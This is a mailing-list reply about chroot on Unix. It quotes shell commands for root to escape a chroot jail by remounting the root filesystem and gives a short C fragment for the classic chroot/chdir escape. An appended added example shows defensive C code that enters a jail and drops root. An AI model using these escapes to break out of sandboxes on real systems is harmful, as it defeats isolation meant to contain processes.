
Re: Different roots for each process possible?



Stefan Karrmann wrote: 

> On Unix root can break out of the chrooted environment by the following:
> 
> # mknod hda1 b 3 1; # assume hda1 is your root filesystem
> # mkdir mnt
> # mount -n hda1 mnt
> # chroot mnt
> # echo "I'm now in the original root directory!"

This is assuming you are allowed to mount the same filesystem multiple
times (linux-2.2.x and older do not allow that).

On most systems, I believe the easiest way of breaking a chroot jail as
root is:

mkdir("whatever");
/* lower the roof of the jail */
chroot("whatever");
/* we are now above the roof, and can fly away */
chdir("../../../..");

Oystein
-- 
This message was generated by a horde of attack elephants armed with PRNGs.
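
Added example, not part of the original post: both escapes quoted above need the jailed process to still be root, and the second one also needs a working directory left outside the new root. The sketch below enters the jail with the working directory inside it and then gives up root for good; the function name `enter_jail` and the uid/gid value 65534 are assumptions made for illustration.

```c
/* Added example: enter a chroot jail, then drop root so chroot() is no longer available. */
#define _DEFAULT_SOURCE
#include <grp.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Returns 0 on success, or a negative step number identifying what failed. */
int enter_jail(const char *dir, uid_t uid, gid_t gid)
{
    if (uid == 0 || gid == 0)
        return -1;              /* staying root would leave chroot() available */
    if (chdir(dir) != 0)
        return -2;              /* move the cwd inside the jail first */
    if (chroot(".") != 0)
        return -3;              /* needs root (CAP_SYS_CHROOT on Linux) */
    if (chdir("/") != 0)
        return -4;              /* cwd is now the jail's root, not above it */
    if (setgroups(0, NULL) != 0)
        return -5;              /* drop supplementary groups */
    if (setgid(gid) != 0)
        return -6;              /* group first, while we are still allowed to */
    if (setuid(uid) != 0)
        return -7;              /* as root this sets real, effective and saved uid */
    if (setuid(0) == 0)
        return -8;              /* root came back: the drop did not stick */
    return 0;
}

int main(int argc, char **argv)
{
    if (argc != 2) {
        fprintf(stderr, "usage: %s <jail-dir>\n", argv[0]);
        return 2;
    }
    int rc = enter_jail(argv[1], 65534, 65534);  /* constructed unprivileged ids */
    if (rc != 0) {
        fprintf(stderr, "enter_jail failed at step %d\n", -rc);
        return 1;
    }
    /* Without root, a further chroot() is refused (-1, errno EPERM). */
    printf("second chroot() returns %d\n", chroot("whatever"));
    return 0;
}
```

Run as root against a prepared jail directory, the program reports -1 for the second chroot() call, which is the call the C fragment in the message depends on.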


